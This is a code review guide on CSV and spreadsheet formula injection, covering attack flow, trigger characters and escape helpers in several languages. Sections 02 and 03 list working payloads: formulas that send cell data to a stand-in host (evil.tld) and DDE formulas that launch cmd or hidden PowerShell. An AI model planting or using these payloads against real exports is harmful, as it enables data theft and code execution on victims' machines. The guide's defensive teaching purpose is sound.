CSV & Formula Injection Code Review Guide

01 //Introduction

CSV / formula injection, sometimes called spreadsheet formula injection, is a server-to-client attack that lives entirely outside the application's own runtime. An attacker submits a field that looks like ordinary text (=HYPERLINK(...), =cmd|'/c calc'!A1, @SUM(...)) into any user-controlled input that will eventually appear in an exported spreadsheet. The application stores it as inert text. Hours or days later, an administrator clicks "Export to CSV", downloads the file, opens it in Excel or LibreOffice, and the formula executes on their machine, with their permissions, against their documents.

The bug class is unusual in three ways. First, the attacker code and the victim machine are separated by a long time delay and by a human action. Second, the vulnerable component is the spreadsheet client (Excel, LibreOffice Calc, Numbers, Google Sheets), not the web application, which is why the application's WAF, CSP, output encoding, and HTML escaping are all irrelevant. Third, the victims are almost always internal: finance, support, ops, compliance teams running batch exports. That demographic makes phishing pivots and credential theft especially valuable, which is why CSV injection has been popular with red teams and CTF authors since at least 2014.

CSV is not a file format

There is no single CSV specification. RFC 4180 documents one common dialect but no spreadsheet vendor follows it strictly. Excel, LibreOffice, Numbers, and Google Sheets each parse CSV slightly differently, different delimiter detection, different quote handling, different formula-evaluation rules. Any code that emits "CSV" is in practice emitting a permissive plaintext that gets re-interpreted by whichever tool opens it. That re-interpretation is where the vulnerability lives.

OWASP catalogued this class as CSV Injection after a public 2014 write-up by James Kettle. The Comma Separated Vulnerabilities series and the well-known =cmd|'/c calc'!A1 proof-of-concept date from then. The attack remains live a decade later because the defaults in every major spreadsheet program have not changed, and because new export pipelines are shipped weekly by every SaaS company that has ever built an admin dashboard.

An attacker registers an account with the display name `=HYPERLINK("https://evil.tld/?c="&A2,"Click for prize")`. The application HTML-encodes the name when rendering it on the web UI (so XSS is blocked), and stores it as plain text in PostgreSQL. Where does this become a vulnerability?

02 //The Attack Flow

Every CSV injection follows the same three-stage flow: a low-privilege attacker submits a formula-shaped payload into any field that the application accepts, the application stores it untouched, and a higher-privilege user later opens the export. The application is just a courier, it is never the place where code executes. That structure is what gives the bug its long-range, persistence-like quality, and what makes it invisible to most application-level scanners.

$ ./diagram --csv-injection-flow

1. Attacker

Submits =cmd|'/c calc'!A1 in a name field

→

2. App stores it

Plain text in DB, no executable on the server

→

3. Admin exports

CSV / XLSX report sent to victim

→

4. Excel evaluates

Formula runs in victim's OS context

⚠ key insight

The vulnerable code is not on the server that stored the data, and not on the server that generated the export. The vulnerability triggers in the spreadsheet client on the victim's machine, usually an admin, accountant, or analyst with elevated context. That is what makes this bug class so reliably high-impact: the victim is almost always someone whose desktop is worth compromising.

The shape of a realistic attack chain depends on what the spreadsheet client allows. Modern Excel disables Dynamic Data Exchange (DDE) by default since the 2017 patch wave (CVE-2017-11826 et al.) and shows a yellow warning bar for external content, but those mitigations are easy to defeat in practice: most users click "Enable Content" reflexively, and many of the most damaging payloads (=HYPERLINK, =WEBSERVICE, =IMPORTXML) do not trigger any warning at all.

Common Sink Surfaces in Real Applications

Where the export lives	Typical formula triggers
Admin "export users" CSV	username, display name, bio, address, support notes
Billing / invoice export	company name, line-item description, tax ID, memo
Support ticket dump	ticket subject, reporter name, last message, custom fields
Audit-log export	actor name, target resource path, free-text reason
CRM contact export	first/last/middle name, job title, notes, tags
Survey / form responses	every free-text answer, "other" text fields
Forum / community report	post title, post body, username, channel name
BI / analytics download	group-by labels, pivot row/column headers, dimension values
GDPR data-portability export	every field the user themselves can edit, practically all of them

GDPR exports are a perfect carrier

Article 20 (right to data portability) requires apps to give users their data in a "structured, commonly used and machine-readable format", usually CSV or JSON. The user requesting the export is also the user supplying every value in it. CSV-formatted GDPR exports therefore default to a 100% attacker-controlled spreadsheet. Hand that file to a downstream consumer (legal, support, a migrating-to-competitor tool) and the formula fires. Several CVEs in 2019-2021 came from exactly this surface.

A typical vulnerable export endpoint (Node + csv-stringify)

javascript

1// VULNERABLE, csv-stringify quotes commas and quotes, but does NOT
2//             escape leading = / + / - / @ characters. The library is
3//             RFC-4180-correct; it is not formula-injection-safe by
4//             default. The application has to do that itself.
5import { stringify } from 'csv-stringify/sync';
6import { db } from './db';
7
8export async function exportUsersCsv(res) {
9  const users = await db.query('SELECT id, email, display_name, bio FROM users');
10  const rows = users.map(u => [u.id, u.email, u.display_name, u.bio]);
11
12  res.setHeader('Content-Type', 'text/csv');
13  res.setHeader('Content-Disposition', 'attachment; filename="users.csv"');
14  res.send(stringify([['ID', 'Email', 'Name', 'Bio'], ...rows]));
15}
16
17// An attacker with display_name = =HYPERLINK("https://evil.tld/?u="&B2,"View profile")
18// produces a CSV where the admin sees "View profile" in the Name column.
19// Clicking it sends the admin&apos;s row-B email to evil.tld.

Your team patches the CSV export to prefix every cell with a single quote ('). A pentester reports that the XLSX export endpoint is still vulnerable. Why?

03 //Trigger Characters & Payload Anatomy

A cell is interpreted as a formula by the spreadsheet client when its first non-whitespace character is one of =, +, -, or @. Tab (\t) and carriage return (\r) are stripped first, so a field that begins with whitespace followed by a trigger is still evaluated. The naive defense "block fields starting with =" therefore misses three other prefixes and the whitespace-prefixed bypass.

$ ./diagram --formula-triggers

Cell starts with → formula

=, canonical formula prefix
+, Excel/Calc interpret as formula
-, Excel/Calc interpret as formula
@, Excel-only legacy formula prefix
\t, \r, strip leading whitespace then re-check
=cmd, =DDE(, Windows DDE on older Excel

Cell starts with → literal text

'=..., leading apostrophe forces text
"=...", quoted form in proper CSV writer
Any non-trigger character (letter, digit, space, punctuation other than = + - @)
Cell already typed as a string in XLSX (<c t="s">)

$ heuristic

The exhaustive trigger list is { '=', '+', '-', '@', '\t', '\r' }. Tab and carriage return matter because Excel strips leading whitespace before checking the first character. A field that starts with \t=cmd... is still a formula.

Payload Catalogue, What an Attacker Actually Writes

Payload	Effect	Modern default behaviour
=cmd\|'/c calc'!A1	DDE: launches calc.exe on Windows under the user's privileges	Disabled by default since Excel 2017, but still works on many older corporate builds
=HYPERLINK("https://evil.tld/?x="&A2,"click me")	Renders a clickable hyperlink that exfiltrates a neighbouring cell to the attacker	Runs silently with no warning in Excel, LibreOffice, and Numbers
=IMPORTXML("https://evil.tld/?x="&A2,"//x")	Google Sheets only, fetches a URL with a neighbouring cell concatenated; pure HTTP exfiltration	Executes silently; classic Google Sheets data-leak primitive
=WEBSERVICE("https://evil.tld/?x="&A2)	Excel-only, fetches a URL with cell data; result becomes the cell value	Was removed/limited in Excel for Microsoft 365 in 2023 but still present on older builds
=IMAGE("https://evil.tld/?cookie="&A2)	Google Sheets, fetches an image whose URL exfiltrates data	Loads silently on sheet open
=DDE("cmd";"/c calc";"!A1")	Same as the \| form, more recent syntax	DDE blocked by default but bypasses keep appearing
+SUM(1+9)*cmd\|'/c calc'!A1	The + prefix variant, equally effective as = on Excel and Calc	Often missed by allow-lists that only check for =
-2+3+cmd\|'/c calc'!A1	The - prefix variant, looks like a negative number, evaluates as a formula	Reliable bypass for value-must-start-with-minus rules (e.g. negative balances)
@SUM(cmd\|'/c calc'!A1)	Excel-only legacy @ prefix from Lotus-1-2-3 compatibility	Still recognised by Excel as a formula prefix; ignored by LibreOffice

Three payloads worth memorising

text

1# Exfiltration with zero warnings (works in Excel, Calc, Numbers).
2=HYPERLINK("https://evil.tld/?leak=" & A2 & "_" & B2, "Click here for refund")
3
4# Pure HTTP GET on sheet open, Google Sheets specific, no user click required.
5=IMPORTXML("https://evil.tld/?x=" & A2, "//x")
6
7# Code execution via DDE on legacy Excel, still useful in enterprise environments.
8=cmd|'/c powershell -nop -w hidden -enc <base64>'!A1

The "user must click Enable Content" excuse is not a control

Vendors and developers love to claim that Excel's yellow security bar makes CSV injection a non-issue. In practice, admins running batch exports of their own application data click "Enable Content" by reflex, because the file came from a trusted internal tool. =HYPERLINK, =IMPORTXML, and =IMAGE show no warning at all. Treat the warning bar as defense-in-depth, never as the primary control.

Exfiltration without leaving the spreadsheet

text

1# All three of these payloads, placed in a username or display name
2# field, will exfiltrate the contents of cell B2 (typically the admin&apos;s
3# email or another sensitive value) to attacker-controlled infrastructure.
4#
5# Google Sheets, fires automatically on sheet open, no click needed.
6=IMPORTXML("https://evil.tld/x?d=" & ENCODEURL(B2), "//a")
7=IMAGE("https://evil.tld/x?d=" & ENCODEURL(B2))
8=IMPORTDATA("https://evil.tld/x?d=" & ENCODEURL(B2))
9
10# Excel desktop, fires on click, no Enable Content prompt.
11=HYPERLINK("https://evil.tld/x?d=" & B2, "View record")
12
13# LibreOffice Calc, same as Excel.
14=WEBSERVICE("https://evil.tld/x?d=" & B2)

A reviewer asks: 'we already block fields that start with =. Is that enough?' What is the correct answer?

04 //Mitigation Patterns

There are three correct mitigations, in rough order of preference. Use the right format (XLSX with explicit string typing); escape user-controlled text before it enters a CSV cell; or refuse to emit user data in spreadsheet formats at all, offering JSON or a typed download instead. Each has trade-offs; the right answer depends on who consumes the file.

Mitigation Options at a Glance

Strategy	How	When to use
Format change to typed XLSX	Emit XLSX with cell type = inline string. Excel will not evaluate a typed string cell.	Best when consumers have Excel, preserves rich formatting and is impervious to prefix tricks.
CSV with apostrophe escaping	Prefix every cell whose first char is = + - @ \t \r with a single quote (')	Standard "best effort" CSV mitigation. Works for Excel and Calc but the apostrophe is visible in some tools.
CSV with quote wrapping + escape	Wrap the cell in double quotes AND prefix the trigger character with apostrophe inside the quotes	Belt-and-braces, survives most edge cases including embedded newlines.
Strip / reject triggers	Reject any value whose first non-whitespace character is a trigger, or strip those characters	Useful when you control the input domain (numeric IDs, enum values), too lossy for free text.
Switch to JSON	Offer a typed JSON download instead of CSV	Best when the consumer is another program or a developer. No re-interpretation happens because JSON has no spreadsheet semantics.

The reference CSV-escape function (TypeScript)

typescript

1// lib/csv-safe.ts, a single canonical helper to use at every export site.
2//
3// Strategy: if the first character (after stripping leading whitespace
4// that Excel itself would strip) is a formula trigger, prefix the value
5// with a single apostrophe so Excel treats it as literal text. Then
6// run the value through a real CSV writer that handles quoting.
7
8const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@']);
9
10/** Returns a value safe to feed into any CSV writer. */
11export function csvSafe(value: unknown): string {
12  if (value === null || value === undefined) return '';
13  const s = String(value);
14
15  // Strip the prefix characters Excel itself strips, then look at the
16  // first surviving character. Tab and CR count as whitespace for
17  // this purpose.
18  const stripped = s.replace(/^[\t\r\n ]+/, '');
19  const first = stripped.charAt(0);
20
21  if (FORMULA_TRIGGERS.has(first)) {
22    return "'" + s;
23  }
24  return s;
25}
26
27// Use the helper at EVERY export site. Do not pass raw values through.
28import { stringify } from 'csv-stringify/sync';
29res.send(
30  stringify([
31    headers,
32    ...rows.map(r => r.map(csvSafe)),
33  ])
34);

The apostrophe is visible in some tools

When Excel and LibreOffice import a CSV cell that starts with ', they treat the rest as text and hide the apostrophe in the cell value. Python's csv module, pandas.read_csv, and most BI ingestion pipelines do not strip the apostrophe, they read the raw bytes. If your consumer is another program, escape on the consumer side or use a typed format. Apostrophe escaping is for human-opened CSV, not for machine-consumed CSV.

Python equivalent

python

1# lib/csv_safe.py
2import csv
3
4_FORMULA_TRIGGERS = {"=", "+", "-", "@"}
5
6def csv_safe(value) -> str:
7    if value is None:
8        return ""
9    s = str(value)
10    stripped = s.lstrip("\t\r\n ")
11    if stripped and stripped[0] in _FORMULA_TRIGGERS:
12        return "'" + s
13    return s
14
15# Always pipe through csv_safe before writing.
16def write_users_csv(users, fp):
17    w = csv.writer(fp)
18    w.writerow(["id", "email", "display_name", "bio"])
19    for u in users:
20        w.writerow([
21            u.id,
22            csv_safe(u.email),
23            csv_safe(u.display_name),
24            csv_safe(u.bio),
25        ])

Java equivalent (Apache Commons CSV / OpenCSV-agnostic)

java

1public final class CsvSafe {
2    private static final Set<Character> TRIGGERS =
3        Set.of('=', '+', '-', '@');
4
5    public static String escape(Object value) {
6        if (value == null) return "";
7        String s = value.toString();
8        // Strip Excel-stripped leading whitespace before checking.
9        int i = 0;
10        while (i < s.length()) {
11            char c = s.charAt(i);
12            if (c == '\t' || c == '\r' || c == '\n' || c == ' ') i++;
13            else break;
14        }
15        if (i < s.length() && TRIGGERS.contains(s.charAt(i))) {
16            return "'" + s;
17        }
18        return s;
19    }
20}
21
22// Use at every export site.
23for (User u : users) {
24    printer.printRecord(
25        u.getId(),
26        CsvSafe.escape(u.getEmail()),
27        CsvSafe.escape(u.getDisplayName()),
28        CsvSafe.escape(u.getBio())
29    );
30}

One helper per codebase, used everywhere

The pattern that actually works in practice is the same as for secure randomness or HTML escaping: a single csvSafe() helper in a shared library, with a lint or grep rule that flags any CSV writer that is not fed through it. The helper is six lines of code. The discipline is what matters, every new export endpoint must use it, and code review enforces that.

A developer proposes: 'just strip the leading = / + / - / @ from any field before exporting.' Why is that worse than prefixing with an apostrophe?

05 //Conclusion

CSV / formula injection is a textbook case of trust transferred across a layer that nobody owns. The application is correct; the CSV writer is correct; Excel is correct. The vulnerability lives in the seam between them, the moment a string the application treated as a value becomes a string the spreadsheet treats as a formula. Fix it the same way every adjacent bug class is fixed: a single helper, applied everywhere, enforced in CI, paired with a format change for the machine-consumed paths.

Review Checklist Recap

Treat = + - @ \t \r as the full trigger set, not just = · Apostrophe-prefix every user-controlled CSV cell · Explicitly type every user-controlled XLSX/ODS cell as string · Centralise the escape in one helper, used at every export site · Prefer JSON for machine consumers, XLSX-with-typed-cells for human consumers · Add a Semgrep / CodeQL rule that flags raw CSV writes without the helper · Treat the spreadsheet client's "Enable Content" warning as defense-in-depth, never as the primary control.

When you see a new export endpoint in a diff, the first question is not "does it produce a valid file", it is "what does the consumer do with this file?" If the answer involves Excel, LibreOffice, Numbers, or Google Sheets, every user-controlled string in the file is potentially executable code. The fix is one helper away. Pair this module with the HTTP Header Injection, Server-Side Template Injection, and Secure Logging Practices guides for the adjacent classes where the bug is "an output sink reinterprets your data as something more dangerous."

Learn the patterns,
then go find them.

CSV & Formula Injection Code Review Guide

01 //Introduction

02 //The Attack Flow

Common Sink Surfaces in Real Applications

03 //Trigger Characters & Payload Anatomy

Payload Catalogue, What an Attacker Actually Writes

04 //Mitigation Patterns

Mitigation Options at a Glance

05 //Conclusion

Blurred Premium Content

More Value Behind This Gate

Premium Content

Learn the patterns,then go find them.

01 //Introduction

02 //The Attack Flow

Common Sink Surfaces in Real Applications

03 //Trigger Characters & Payload Anatomy

Payload Catalogue, What an Attacker Actually Writes

04 //Mitigation Patterns

Mitigation Options at a Glance

05 //Conclusion

Blurred Premium Content

More Value Behind This Gate

Premium Content

Learn the patterns,
then go find them.